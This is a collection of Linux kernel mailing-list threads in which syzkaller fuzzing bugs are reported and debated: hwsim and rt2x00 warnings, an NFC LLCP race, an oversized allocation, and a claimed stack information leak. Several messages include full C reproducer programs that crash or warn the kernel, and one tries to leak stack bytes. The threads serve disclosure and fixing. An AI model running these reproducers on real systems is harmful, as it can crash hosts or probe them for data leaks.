> &(0x7f007000)={&(0x7f1ca000)={0x14, 0x1c, 0x109,
> 0x, 0x, {0x4, 0x0, 0x0}, []}, 0x14},
> 0x1, 0x0, 0x0, 0x0}, 0x0)
>
> I've reformatted it as
>
> sendmsg$nl_generic(
> r1,
> &(0x7fb3e000-0x38)={
> addr=   &(0x7fd4a000-0xc)={
> 0x10, 0x0, 0x0, 0x0
> },
> addrlen=0xc,
> vec=&(0x7f007000)={
> ptr=&(0x7f1ca000)={
> 0x14, 0x1c, 0x109, 0x,
> 0x, {0x4, 0x0, 0x0}, []
> },
> len=0x14
> },
> vlen=   0x1,
> ctrl=   0x0,
> ctrllen=0x0,
> f=  0x0
> },
> 0x0
> )
>
> but am still getting lost - what exactly is the *byte* sequence inside
> the (full) message (including headers)?

Hi,

I think you decoded it correctly. The netlink message is:

{0x14, 0x1c, 0x109, 0x, 0x, {0x4, 0x0, 0x0}, []}

0x14 length, 0x1c is type, etc

These numbers are input data for there descriptions:
https://github.com/google/syzkaller/blob/master/sys/linux/socket_netlink.txt
which generally match C structures as you expect.

However, there can be some surprising things, for example, executing
one ioctl/setsockopt with data meant for another one, or these
0x are actually mean 0 (for involved reasons), or we
can simply have bugs in these descriptions so they don't match C
structures and then all data is messed/shifted.

If this representation does not make sense to you right away, your
best bet is looking at/running the C reproducer where you can see true
data layout:

  *(uint64_t*)0x20b3dfc8 = 0x20d49ff4;
  *(uint32_t*)0x20b3dfd0 = 0xc;
  *(uint64_t*)0x20b3dfd8 = 0x20007000;
  *(uint64_t*)0x20b3dfe0 = 1;
  *(uint64_t*)0x20b3dfe8 = 0;
  *(uint64_t*)0x20b3dff0 = 0;
  *(uint32_t*)0x20b3dff8 = 0;
  *(uint16_t*)0x20d49ff4 = 0x10;
  *(uint16_t*)0x20d49ff6 = 0;
  *(uint32_t*)0x20d49ff8 = 0;
  *(uint32_t*)0x20d49ffc = 0;
  *(uint64_t*)0x20007000 = 0x201ca000;
  *(uint64_t*)0x20007008 = 0x14;
  *(uint32_t*)0x201ca000 = 0x14;
  *(uint16_t*)0x201ca004 = 0x1c;
  *(uint16_t*)0x201ca006 = 0x109;
  *(uint32_t*)0x201ca008 = 0;
  *(uint32_t*)0x201ca00c = 0;
  *(uint8_t*)0x201ca010 = 4;
  *(uint8_t*)0x201ca011 = 0;
  *(uint16_t*)0x201ca012 = 0;
  syscall(__NR_sendmsg, r[1], 0x20b3dfc8, 0);


> Ah, then again, now I see the fault injection - I guess dev_set_name()
> just failed and we didn't check the return value, will fix that.

Yes, it's highly likely the root cause. The raw.log file shows there
there was an immediately preceding fault in kmalloc in the same
process, in a close stack.


Re: WARNING in wiphy_register

2018-01-15 Thread Dmitry Vyukov
On Mon, Jan 15, 2018 at 9:22 AM, Johannes Berg
 wrote:
> Hi syzbot maintainers,
>
> Thanks for the report.
>
>>   hwsim_new_radio_nl+0x5b7/0x7c0 drivers/net/wireless/mac80211_hwsim.c:3152
>>   genl_family_rcv_msg+0x7b7/0xfb0 net/netlink/genetlink.c:599
>>   genl_rcv_msg+0xb2/0x140 net/netlink/genetlink.c:624
>
> You're getting into the kernel via generic netlink receive, so just as
> an FYI - the generic netlink numbers aren't stable across systems, so
> your reproducer has a quite good chance of not working without your
> kernel .config and (virt) hardware environment.

Hi Johannes,

Thanks for the feeback.
syzbot tests within a net namespace (which is free of eth0 and other
stuff) and does setup of devices in that namespace. For bugs, it first
tries to reproduce them in that environment and if that succeeds it
tries to simplify the reproducer by stripping namespace/device setup
(which is quite verbose), and if that succeeds it provides this
simplified reproducer.
In this case it decided that namespace setup is not important. .config
is still important, but it is provided.

Are you able to reproduce the WARNING with the provided config? If
not, we can look as to how to improve this.


> I'll take a look at this and the rfkill one, I assume that there are
> some sanity checks missing in hwsim generic netlink when it builds a
> radio struct.
>
> However, I can't really promise that I'll be able to validate the
> changes against your reproducer.
>
> johannes
>
> --
> You received this message because you are subscribed to the Google Groups 
> "syzkaller-bugs" group.
> To unsubscribe from this group and stop receiving emails from it, send an 
> email to syzkaller-bugs+unsubscr...@googlegroups.com.
> To view this discussion on the web visit 
> https://groups.google.com/d/msgid/syzkaller-bugs/1516004561.410.3.camel%40sipsolutions.net.
> For more options, visit https://groups.google.com/d/optout.


Re: usb/net/rt2x00: warning in rt2800_eeprom_word_index

2017-10-19 Thread Dmitry Vyukov
On Mon, Oct 16, 2017 at 2:19 PM, Dmitry Vyukov <dvyu...@google.com> wrote:
> On Mon, Oct 16, 2017 at 11:40 AM, Stanislaw Gruszka <sgrus...@redhat.com> 
> wrote:
>> Hi Dmitry
>>
>> On Sat, Oct 14, 2017 at 04:38:03PM +0200, Dmitry Vyukov wrote:
>>> On Thu, Oct 12, 2017 at 9:25 AM, Stanislaw Gruszka <sgrus...@redhat.com> 
>>> wrote:
>>> > Hi
>>> >
>>> > On Mon, Oct 09, 2017 at 07:50:53PM +0200, Andrey Konovalov wrote:
>>> >> I've got the following report while fuzzing the kernel with syzkaller.
>>> >>
>>> >> On commit 8a5776a5f49812d29fe4b2d0a2d71675c3facf3f (4.14-rc4).
>>> >>
>>> >> I'm not sure whether this is a bug in the driver, or just a way to
>>> >> report misbehaving device. In the latter case this shouldn't be a
>>> >> WARN() call, since WARN() means bug in the kernel.
>>> >
>>> > This is about wrong EEPROM, which reported 3 tx streams on
>>> > non 3 antenna device. I think WARN() is justified and thanks
>>> > to the call trace I was actually able to to understand what
>>> > happened.
>>> >
>>> > In general I do not think WARN() only means a kernel bug, it
>>> > can be F/W or H/W bug too.
>>>
>>> Hi Stanislaw,
>>>
>>> Printing messages is fine. Printing stacks is fine. Just please make
>>> them distinguishable from kernel bugs and don't kill the whole
>>> possibility of automated Linux kernel testing. That's an important
>>> capability.
>>
>> We do not distinguish between bugs and other problems when WARN() is
>> used in (wireless) drivers, what I think is correct, taking comment from
>> include/asm-generic/bug.h :
>>
>> /*
>>  * WARN(), WARN_ON(), WARN_ON_ONCE, and so on can be used to report
>>  * significant issues that need prompt attention if they should ever
>>  * appear at runtime.  Use the versions with printk format strings
>>  * to provide better diagnostics.
>>  */
>>
>> Historically we have BUG() to mark the bugs, but usage if it is not
>> recommended as it can kill the system, so for anything that can
>> be recovered in runtime - WARN() is recommended.
>>
>> Perhaps we can introduce another helper like PROBLEM() for marking
>> situations when something is wrong, but it is not a bug. However I'm
>> not even sure at what extent it can be used, since for many cases
>> if not the most, driver author can not tell apriori if the problem
>> is a bug in the driver or HW/FW misbehaviour (or maybe particular
>> issue can happen because of both).
>
> I will write a separate email to LKML.


Sent a mail titled "Distinguishing kernel bugs from invalid inputs" to
LKML. Here is a copy:
https://groups.google.com/forum/#!topic/syzkaller/dGh7qtbu14Q


Re: usb/net/rt2x00: warning in rt2800_eeprom_word_index

2017-10-16 Thread Dmitry Vyukov
On Mon, Oct 16, 2017 at 12:27 PM, Kalle Valo <kv...@codeaurora.org> wrote:
> Dmitry Vyukov <dvyu...@google.com> writes:
>
>> On Thu, Oct 12, 2017 at 9:25 AM, Stanislaw Gruszka <sgrus...@redhat.com> 
>> wrote:
>>> Hi
>>>
>>> On Mon, Oct 09, 2017 at 07:50:53PM +0200, Andrey Konovalov wrote:
>>>> I've got the following report while fuzzing the kernel with syzkaller.
>>>>
>>>> On commit 8a5776a5f49812d29fe4b2d0a2d71675c3facf3f (4.14-rc4).
>>>>
>>>> I'm not sure whether this is a bug in the driver, or just a way to
>>>> report misbehaving device. In the latter case this shouldn't be a
>>>> WARN() call, since WARN() means bug in the kernel.
>>>
>>> This is about wrong EEPROM, which reported 3 tx streams on
>>> non 3 antenna device. I think WARN() is justified and thanks
>>> to the call trace I was actually able to to understand what
>>> happened.
>>>
>>> In general I do not think WARN() only means a kernel bug, it
>>> can be F/W or H/W bug too.
>>
>> Hi Stanislaw,
>>
>> Printing messages is fine. Printing stacks is fine. Just please make
>> them distinguishable from kernel bugs and don't kill the whole
>> possibility of automated Linux kernel testing. That's an important
>> capability.
>
> Not really following you. Are you saying that using WARN() prevents
> automated Linux kernel testing?


Absence of a way to understand when there is something wrong with
kernel (something to notify kernel developers about) is the problem.


Re: usb/net/rt2x00: warning in rt2800_eeprom_word_index

2017-10-16 Thread Dmitry Vyukov
On Mon, Oct 16, 2017 at 11:40 AM, Stanislaw Gruszka <sgrus...@redhat.com> wrote:
> Hi Dmitry
>
> On Sat, Oct 14, 2017 at 04:38:03PM +0200, Dmitry Vyukov wrote:
>> On Thu, Oct 12, 2017 at 9:25 AM, Stanislaw Gruszka <sgrus...@redhat.com> 
>> wrote:
>> > Hi
>> >
>> > On Mon, Oct 09, 2017 at 07:50:53PM +0200, Andrey Konovalov wrote:
>> >> I've got the following report while fuzzing the kernel with syzkaller.
>> >>
>> >> On commit 8a5776a5f49812d29fe4b2d0a2d71675c3facf3f (4.14-rc4).
>> >>
>> >> I'm not sure whether this is a bug in the driver, or just a way to
>> >> report misbehaving device. In the latter case this shouldn't be a
>> >> WARN() call, since WARN() means bug in the kernel.
>> >
>> > This is about wrong EEPROM, which reported 3 tx streams on
>> > non 3 antenna device. I think WARN() is justified and thanks
>> > to the call trace I was actually able to to understand what
>> > happened.
>> >
>> > In general I do not think WARN() only means a kernel bug, it
>> > can be F/W or H/W bug too.
>>
>> Hi Stanislaw,
>>
>> Printing messages is fine. Printing stacks is fine. Just please make
>> them distinguishable from kernel bugs and don't kill the whole
>> possibility of automated Linux kernel testing. That's an important
>> capability.
>
> We do not distinguish between bugs and other problems when WARN() is
> used in (wireless) drivers, what I think is correct, taking comment from
> include/asm-generic/bug.h :
>
> /*
>  * WARN(), WARN_ON(), WARN_ON_ONCE, and so on can be used to report
>  * significant issues that need prompt attention if they should ever
>  * appear at runtime.  Use the versions with printk format strings
>  * to provide better diagnostics.
>  */
>
> Historically we have BUG() to mark the bugs, but usage if it is not
> recommended as it can kill the system, so for anything that can
> be recovered in runtime - WARN() is recommended.
>
> Perhaps we can introduce another helper like PROBLEM() for marking
> situations when something is wrong, but it is not a bug. However I'm
> not even sure at what extent it can be used, since for many cases
> if not the most, driver author can not tell apriori if the problem
> is a bug in the driver or HW/FW misbehaviour (or maybe particular
> issue can happen because of both).

I will write a separate email to LKML.

Thanks


Re: usb/net/rt2x00: warning in rt2800_eeprom_word_index

2017-10-14 Thread Dmitry Vyukov
On Thu, Oct 12, 2017 at 9:25 AM, Stanislaw Gruszka  wrote:
> Hi
>
> On Mon, Oct 09, 2017 at 07:50:53PM +0200, Andrey Konovalov wrote:
>> I've got the following report while fuzzing the kernel with syzkaller.
>>
>> On commit 8a5776a5f49812d29fe4b2d0a2d71675c3facf3f (4.14-rc4).
>>
>> I'm not sure whether this is a bug in the driver, or just a way to
>> report misbehaving device. In the latter case this shouldn't be a
>> WARN() call, since WARN() means bug in the kernel.
>
> This is about wrong EEPROM, which reported 3 tx streams on
> non 3 antenna device. I think WARN() is justified and thanks
> to the call trace I was actually able to to understand what
> happened.
>
> In general I do not think WARN() only means a kernel bug, it
> can be F/W or H/W bug too.

Hi Stanislaw,

Printing messages is fine. Printing stacks is fine. Just please make
them distinguishable from kernel bugs and don't kill the whole
possibility of automated Linux kernel testing. That's an important
capability.

Thanks


net/rfkill: WARNING in rfkill_fop_read

2016-01-26 Thread Dmitry Vyukov
Hello,

The following program triggers WARNING message in rfkill_fop_read:

[ cut here ]
WARNING: CPU: 2 PID: 6975 at kernel/sched/core.c:7663
__might_sleep+0x138/0x1a0()
do not call blocking ops when !TASK_RUNNING; state=1 set at
[] prepare_to_wait_event+0x141/0x410
kernel/sched/wait.c:210
Modules linked in:
CPU: 2 PID: 6975 Comm: a.out Not tainted 4.5.0-rc1+ #283
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
  88003369f908 8299a06d 88003369f978
 8800338e 864453c0 88003369f948 8134fcf9
 813c9cf8 ed00066d3f2b 864453c0 1def
Call Trace:
 [< inline >] __dump_stack lib/dump_stack.c:15
 [] dump_stack+0x6f/0xa2 lib/dump_stack.c:50
 [] warn_slowpath_common+0xd9/0x140 kernel/panic.c:482
 [] warn_slowpath_fmt+0xa9/0xd0 kernel/panic.c:494
 [] __might_sleep+0x138/0x1a0 kernel/sched/core.c:7658
 [] mutex_lock_nested+0x74/0xa50 kernel/locking/mutex.c:617
 [< inline >] rfkill_readable net/rfkill/core.c:1102
 [] rfkill_fop_read+0x23d/0x3e0 net/rfkill/core.c:1125
 [] do_loop_readv_writev+0x141/0x1e0 fs/read_write.c:719
 [] do_readv_writev+0x5f8/0x6e0 fs/read_write.c:849
 [] vfs_readv+0x83/0xb0 fs/read_write.c:873
 [< inline >] SYSC_readv fs/read_write.c:899
 [] SyS_readv+0x111/0x2b0 fs/read_write.c:891
 [] entry_SYSCALL_64_fastpath+0x16/0x7a
arch/x86/entry/entry_64.S:185
---[ end trace 8fc3336c73e4219c ]---


// autogenerated by syzkaller (http://github.com/google/syzkaller)
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

long r[8];

void* thr(void* arg)
{
  switch ((long)arg) {
  case 0:
r[0] = syscall(SYS_mmap, 0x2000ul, 0x5ul, 0x3ul, 0x32ul,
   0xul, 0x0ul);
break;
  case 1:
r[2] = open("/dev/rfkill", O_RDWR);
break;
  case 2:
*(uint64_t*)0x20042fe0 = (uint64_t)0x20042ff9;
*(uint64_t*)0x20042fe8 = (uint64_t)0x7;
*(uint64_t*)0x20042ff0 = (uint64_t)0x20032fa1;
*(uint64_t*)0x20042ff8 = (uint64_t)0xf4;
r[7] = syscall(SYS_readv, r[2], 0x20042fe0ul, 0x2ul, 0, 0, 0);
break;
  }
  return 0;
}

void worker()
{
  long i;
  pthread_t th[3];

  memset(r, -1, sizeof(r));
  for (i = 0; i < 3; i++) {
pthread_create([i], 0, thr, (void*)i);
usleep(1);
  }
  for (i = 0; i < 3; i++) {
pthread_create([i], 0, thr, (void*)i);
if (i % 2 == 0)
  usleep(1);
  }
  usleep(10);
}

int main()
{
  int i, status, pids[16];

  for (;;) {
for (i = 0; i < 16; i++) {
  if ((pids[i] = fork()) == 0) {
worker();
exit(0);
  }
}
for (i = 0; i < 16; i++) {
  while (waitpid(pids[i], , __WALL) != pids[i]) {
  }
}
  }
  return 0;
}

On commit 92e963f50fc74041b5e9e744c330dca48e04f08d (Jan 24).
--
To unsubscribe from this list: send the line "unsubscribe linux-wireless" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [Patch net] nfc: check sock state in llcp_sock_getname()

2016-01-02 Thread Dmitry Vyukov
On Sat, Jan 2, 2016 at 1:34 AM, Cong Wang <xiyou.wangc...@gmail.com> wrote:
> llcp_sock_getname() checks llcp_sock->dev to make sure
> llcp_sock is already connected or bound, however, we could
> be in the middle of llcp_sock_bind() where llcp_sock->dev
> is bound and llcp_sock->service_name_len is set,
> but llcp_sock->service_name is not, in this case we would
> lead to copy some bytes from a NULL pointer.
>
> We should just check if sk->sk_state is still closed since
> both connect() and bind() will update this state at the end.

Hi Cong,

This is still racy. If you want to play lock-free then you also need
proper memory barriers. Stores to sk_state need to be
smp_store_release, while the load needs to be smp_load_acquire.
Otherwise getname still can see partially initialized socket.


> Reported-by: Dmitry Vyukov <dvyu...@google.com>
> Cc: Lauro Ramos Venancio <lauro.venan...@openbossa.org>
> Cc: Aloisio Almeida Jr <aloisio.alme...@openbossa.org>
> Cc: Samuel Ortiz <sa...@linux.intel.com>
> Signed-off-by: Cong Wang <xiyou.wangc...@gmail.com>
> ---
>  net/nfc/llcp_sock.c | 2 +-
>  1 file changed, 1 insertion(+), 1 deletion(-)
>
> diff --git a/net/nfc/llcp_sock.c b/net/nfc/llcp_sock.c
> index ecf0a01..5a91997 100644
> --- a/net/nfc/llcp_sock.c
> +++ b/net/nfc/llcp_sock.c
> @@ -500,7 +500,7 @@ static int llcp_sock_getname(struct socket *sock, struct 
> sockaddr *uaddr,
> struct nfc_llcp_sock *llcp_sock = nfc_llcp_sock(sk);
> DECLARE_SOCKADDR(struct sockaddr_nfc_llcp *, llcp_addr, uaddr);
>
> -   if (llcp_sock == NULL || llcp_sock->dev == NULL)
> +   if (llcp_sock == NULL || sk->sk_state == LLCP_CLOSED)
> return -EBADFD;
>
> pr_debug("%p %d %d %d\n", sk, llcp_sock->target_idx,
> --
> 1.8.3.1
>
--
To unsubscribe from this list: send the line "unsubscribe linux-wireless" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


net/nfc: GPF in llcp_sock_getname

2016-01-01 Thread Dmitry Vyukov
Hello,

The following program triggers GPF in llcp_sock_getname:

// autogenerated by syzkaller (http://github.com/google/syzkaller)
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

int fd;

void *thr(void *arg)
{
struct sockaddr_nfc_llcp sa;
sa.sa_family = AF_NFC;
sa.dev_idx = 0;
sa.target_idx = 0x24a8;
sa.nfc_protocol = 0;
sa.dsap = 0;
sa.ssap = 2;
sa.service_name[0] = 7;
sa.service_name[1] = 9;
sa.service_name[2] = 3;
sa.service_name_len = 3;
bind(fd, (struct sockaddr*), sizeof(sa));
return 0;
}

int main()
{
fd = socket(AF_NFC, 0x2ul, 0x1ul);
pthread_t th;
pthread_create(, 0, thr, 0);
struct sockaddr_nfc_llcp sa;
int len = sizeof(sa);
getsockname(fd, (struct sockaddr*), );
return 0;
}


kasan: GPF could be caused by NULL-ptr deref or user memory
accessgeneral protection fault:  [#51] SMP KASAN
Modules linked in:
CPU: 2 PID: 4207 Comm: a.out Not tainted 4.4.0-rc7+ #184
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
task: 8800683e9780 ti: 880064c7 task.ti: 880064c7
RIP: 0010:[]  []
kasan_report_error+0x1b/0x560
RSP: 0018:880064c77c90  EFLAGS: 00010286
RAX: dc00 RBX: 0003 RCX: dc00
RDX:  RSI: 0003 RDI: 880064c77c98
RBP: 880064c77cc0 R08: ed000c98efd6 R09: 880064c77e58
R10: 8800639670a0 R11: 880063967098 R12: 880064c77e6a
R13:  R14:  R15: 880063967088
FS:  018ca880(0063) GS:88006da0() knlGS:
CS:  0010 DS:  ES:  CR0: 8005003b
CR2: 00c8200012e0 CR3: 64c59000 CR4: 06e0
Stack:
 816d25d4  0018 0003
 00034000 816d17ed 880064c77cd0 816d1264
 880064c77cf8 816d17ed  880064c77e58
Call Trace:
 [< inline >] check_memory_region mm/kasan/kasan.c:264
 [] __asan_loadN+0x124/0x1a0 mm/kasan/kasan.c:512
 [] memcpy+0x1d/0x40 mm/kasan/kasan.c:297
 [] llcp_sock_getname+0x424/0x600 net/nfc/llcp_sock.c:519
 [] SYSC_getsockname+0x1bd/0x220 net/socket.c:1570
 [] SyS_getsockname+0x24/0x30 net/socket.c:1555
 [] entry_SYSCALL_64_fastpath+0x16/0x7a
arch/x86/entry/entry_64.S:185
Code: 48 01 c7 e8 38 2b fc ff 5d c3 66 0f 1f 44 00 00 48 8b 17 48 b9
00 00 00 00 00 fc ff df 48 8b 77 10 48 89 d0 48 c1 e8 03 48 01 c8 <80>
38 00 75 1d 48 01 d6 eb 13 48 83 c2 08 48 89 d0 48 c1 e8 03
RIP  [] kasan_report_error+0x1b/0x560 mm/kasan/report.c:214
 RSP 
---[ end trace b0c68fb0d02b9447 ]---

On commit 8513342170278468bac126640a5d2d12ffbff106 (Dec 28).
GPF seems to be caused by a data race on socket state.
--
To unsubscribe from this list: send the line "unsubscribe linux-wireless" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


net/nfc: user-controllable kmalloc size in nfc_llcp_send_ui_frame

2015-12-30 Thread Dmitry Vyukov
Hello,

The following program triggers WARNING In kmalloc:


[ cut here ]
WARNING: CPU: 2 PID: 6754 at mm/page_alloc.c:2989
__alloc_pages_nodemask+0x771/0x15f0()
Modules linked in:
CPU: 2 PID: 6754 Comm: a.out Not tainted 4.4.0-rc7+ #181
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
  88006275f5e0 8289d9dd 
 8800621c8000 85dbab40 88006275f620 812ebbb9
 815fc6b1 85dbab40 0bad 88006275f8a8
Call Trace:
 [< inline >] __dump_stack lib/dump_stack.c:15
 [] dump_stack+0x6f/0xa2 lib/dump_stack.c:50
 [] warn_slowpath_common+0xd9/0x140 kernel/panic.c:460
 [] warn_slowpath_null+0x29/0x30 kernel/panic.c:493
 [< inline >] __alloc_pages_slowpath mm/page_alloc.c:2989
 [] __alloc_pages_nodemask+0x771/0x15f0 mm/page_alloc.c:3235
 [] alloc_pages_current+0xee/0x340 mm/mempolicy.c:2055
 [< inline >] alloc_pages include/linux/gfp.h:451
 [] alloc_kmem_pages+0x16/0xf0 mm/page_alloc.c:3414
 [] kmalloc_order+0x1f/0x80 mm/slab_common.c:1007
 [] kmalloc_order_trace+0x1f/0x140 mm/slab_common.c:1018
 [< inline >] kmalloc_large include/linux/slab.h:390
 [] __kmalloc+0x2de/0x330 mm/slub.c:3555
 [< inline >] kmalloc include/linux/slab.h:463
 [< inline >] kzalloc include/linux/slab.h:602
 [] nfc_llcp_send_ui_frame+0xdc/0x3d0
net/nfc/llcp_commands.c:732
 [] llcp_sock_sendmsg+0x250/0x310 net/nfc/llcp_sock.c:782
 [< inline >] sock_sendmsg_nosec net/socket.c:610
 [] sock_sendmsg+0xca/0x110 net/socket.c:620
 [] ___sys_sendmsg+0x72a/0x840 net/socket.c:1946
 [] __sys_sendmsg+0xce/0x170 net/socket.c:1980
 [< inline >] SYSC_sendmsg net/socket.c:1991
 [] SyS_sendmsg+0x2d/0x50 net/socket.c:1987
 [] entry_SYSCALL_64_fastpath+0x16/0x7a
arch/x86/entry/entry_64.S:185
---[ end trace 62962d1ed2b9f41a ]---


// autogenerated by syzkaller (http://github.com/google/syzkaller)
#include 
#include 
#include 
#include 

long r[68];

int main()
{
memset(r, -1, sizeof(r));
r[0] = syscall(SYS_mmap, 0x2000ul, 0x2ul, 0x3ul,
0x32ul, 0xul, 0x0ul);
r[1] = syscall(SYS_socket, 0x27ul, 0x2ul, 0x1ul, 0, 0, 0);
*(uint16_t*)0x2000cfa0 = (uint16_t)0x27;
*(uint32_t*)0x2000cfa4 = (uint32_t)0x1;
*(uint32_t*)0x2000cfa8 = (uint32_t)0x8;
*(uint32_t*)0x2000cfac = (uint32_t)0x7;
*(uint8_t*)0x2000cfb0 = (uint8_t)0x0;
*(uint8_t*)0x2000cfb1 = (uint8_t)0x38;
*(uint8_t*)0x2000cfb2 = (uint8_t)0x6;
*(uint8_t*)0x2000cfb3 = (uint8_t)0x0;
*(uint32_t*)0x2000cfb4 = (uint32_t)0x9;
*(uint32_t*)0x2000cfb8 = (uint32_t)0x7;
*(uint32_t*)0x2000cfbc = (uint32_t)0x9;
*(uint32_t*)0x2000cfc0 = (uint32_t)0xfff7;
*(uint32_t*)0x2000cfc4 = (uint32_t)0x8;
*(uint32_t*)0x2000cfc8 = (uint32_t)0xcf77;
*(uint32_t*)0x2000cfcc = (uint32_t)0x39;
*(uint32_t*)0x2000cfd0 = (uint32_t)0x6;
*(uint32_t*)0x2000cfd4 = (uint32_t)0x8;
*(uint32_t*)0x2000cfd8 = (uint32_t)0x4;
*(uint32_t*)0x2000cfdc = (uint32_t)0x4b;
*(uint32_t*)0x2000cfe0 = (uint32_t)0x9;
*(uint32_t*)0x2000cfe4 = (uint32_t)0x5;
*(uint32_t*)0x2000cfe8 = (uint32_t)0x4;
*(uint32_t*)0x2000cfec = (uint32_t)0x7;
*(uint8_t*)0x2000cff0 = (uint8_t)0xfffd;
*(uint64_t*)0x2000cff8 = (uint64_t)0x8;
r[27] = syscall(SYS_bind, r[1], 0x2000cfa0ul, 0x60ul, 0, 0, 0);
*(uint64_t*)0x20014fc8 = (uint64_t)0x20014000;
*(uint32_t*)0x20014fd0 = (uint32_t)0x60;
*(uint64_t*)0x20014fd8 = (uint64_t)0x20014000;
*(uint64_t*)0x20014fe0 = (uint64_t)0x1;
*(uint64_t*)0x20014fe8 = (uint64_t)0x20014000;
*(uint64_t*)0x20014ff0 = (uint64_t)0x11;
*(uint32_t*)0x20014ff8 = (uint32_t)0x0;
*(uint16_t*)0x20014000 = (uint16_t)0x27;
*(uint32_t*)0x20014004 = (uint32_t)0x3;
*(uint32_t*)0x20014008 = (uint32_t)0x0;
*(uint32_t*)0x2001400c = (uint32_t)0x0;
*(uint8_t*)0x20014010 = (uint8_t)0x2;
*(uint8_t*)0x20014011 = (uint8_t)0x52;
*(uint8_t*)0x20014012 = (uint8_t)0x7;
*(uint8_t*)0x20014013 = (uint8_t)0x2;
*(uint32_t*)0x20014014 = (uint32_t)0x3;
*(uint32_t*)0x20014018 = (uint32_t)0x8;
*(uint32_t*)0x2001401c = (uint32_t)0x9;
*(uint32_t*)0x20014020 = (uint32_t)0xde4;
*(uint32_t*)0x20014024 = (uint32_t)0x8;
*(uint32_t*)0x20014028 = (uint32_t)0x6;
*(uint32_t*)0x2001402c = (uint32_t)0x6850;
*(uint32_t*)0x20014030 = (uint32_t)0x24;
*(uint32_t*)0x20014034 = (uint32_t)0x0;
*(uint32_t*)0x20014038 = (uint32_t)0xffe4;
*(uint32_t*)0x2001403c = (uint32_t)0x6;
*(uint32_t*)0x20014040 = (uint32_t)0x4e;
*(uint32_t*)0x20014044 = (uint32_t)0x6;
*(uint32_t*)0x20014048 = (uint32_t)0xf14c;

Information leak in llcp_sock_bind/llcp_raw_sock_bind

2015-12-15 Thread Dmitry Vyukov
Hello,

The following program leads to leak of unint bytes from kernel stack:

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define NFC_SOCKPROTO_LLCP 1

int main(void)
{
struct sockaddr sa;
unsigned len, i, try;
int fd;

for (try = 0; try < 3; try++) {
fd = socket(AF_NFC, 3, NFC_SOCKPROTO_LLCP);
if (fd == -1)
return;
switch (try) {
case 0:
break;
case 1:
sched_yield();
break;
case 2:
open("/dev/null", O_RDONLY);
}
memset(, 0, sizeof(sa));
sa.sa_family = AF_NFC;
bind(fd, , 2);
len = sizeof(sa);
getsockname(fd, , );
for (i = 0; i < len; i++)
printf("%02x", ((unsigned char*))[i]);
printf("\n");
}
return 0;
}

Output:
2700b002401f4511e5e38f90b002400018006c007c13410028f77610fe7f5e104000
2700b002400212046c164769b002400018006c007c134100c874fff4fe7f5e104000
2700b002408e8a91e4e069fcb002400018006c007c134100f868b3f2fe7f5e104000

The problem is that llcp_sock_bind/llcp_raw_sock_bind do not check
sockaddr_len passed in, so they copy stack garbage from stack into the
socket and then return it in getsockname.
This can defeat ASLR, leak crypto keys, etc.
--
To unsubscribe from this list: send the line "unsubscribe linux-wireless" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: Information leak in llcp_sock_bind/llcp_raw_sock_bind

2015-12-15 Thread Dmitry Vyukov
On Tue, Dec 15, 2015 at 9:36 PM, David Miller <da...@davemloft.net> wrote:
> From: Dmitry Vyukov <dvyu...@google.com>
> Date: Tue, 15 Dec 2015 21:00:20 +0100
>
>> The problem is that llcp_sock_bind/llcp_raw_sock_bind do not check
>> sockaddr_len passed in, so they copy stack garbage from stack into the
>> socket and then return it in getsockname.
>> This can defeat ASLR, leak crypto keys, etc.
>
> That's actually the first thing these functions do.
>
> They completely clear out the on-stack llcp_addr, then they copy only
> as much as the user gave them, being careful not to use more than
> sizeof(llcp_addr).
>
> memset(_addr, 0, sizeof(llcp_addr));
> len = min_t(unsigned int, sizeof(llcp_addr), alen);
> memcpy(_addr, addr, len);
>
> I don't see what the problem is, you'll need to be more specific.

You are right. Sorry.

There still seems to be a minor leak here:

  if (!addr || addr->sa_family != AF_NFC)
  return -EINVAL;

addr->sa_family can be uninit.
--
To unsubscribe from this list: send the line "unsubscribe linux-wireless" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: Information leak in llcp_sock_bind/llcp_raw_sock_bind

2015-12-15 Thread Dmitry Vyukov
On Tue, Dec 15, 2015 at 9:48 PM, David Miller <da...@davemloft.net> wrote:
> From: Dmitry Vyukov <dvyu...@google.com>
> Date: Tue, 15 Dec 2015 21:45:16 +0100
>
>> On Tue, Dec 15, 2015 at 9:36 PM, David Miller <da...@davemloft.net> wrote:
>>> From: Dmitry Vyukov <dvyu...@google.com>
>>> Date: Tue, 15 Dec 2015 21:00:20 +0100
>>>
>>>> The problem is that llcp_sock_bind/llcp_raw_sock_bind do not check
>>>> sockaddr_len passed in, so they copy stack garbage from stack into the
>>>> socket and then return it in getsockname.
>>>> This can defeat ASLR, leak crypto keys, etc.
>>>
>>> That's actually the first thing these functions do.
>>>
>>> They completely clear out the on-stack llcp_addr, then they copy only
>>> as much as the user gave them, being careful not to use more than
>>> sizeof(llcp_addr).
>>>
>>> memset(_addr, 0, sizeof(llcp_addr));
>>> len = min_t(unsigned int, sizeof(llcp_addr), alen);
>>> memcpy(_addr, addr, len);
>>>
>>> I don't see what the problem is, you'll need to be more specific.
>>
>> You are right. Sorry.
>>
>> There still seems to be a minor leak here:
>>
>>   if (!addr || addr->sa_family != AF_NFC)
>>   return -EINVAL;
>>
>> addr->sa_family can be uninit.
>
> That shouldn't matter at all, that can't cause socket state corruption.
>
> I want to ask you if you are actually seeing kernel stack in that hexdump
> you are posting?  If so, how do you actually account for it?  Nothing you
> have shown so far make that clear.

I've seen a kernel address at least in pptp_bind, it was a return pc
in SyS_socket call that was executed just before bind.
Exact contents of the leaked info depend on kernel config, compiler
and a previous executed syscall (there are thousands of them if we
count ioctls and friends). So it is almost impossible to prove that a
PC cannot be leaked.
--
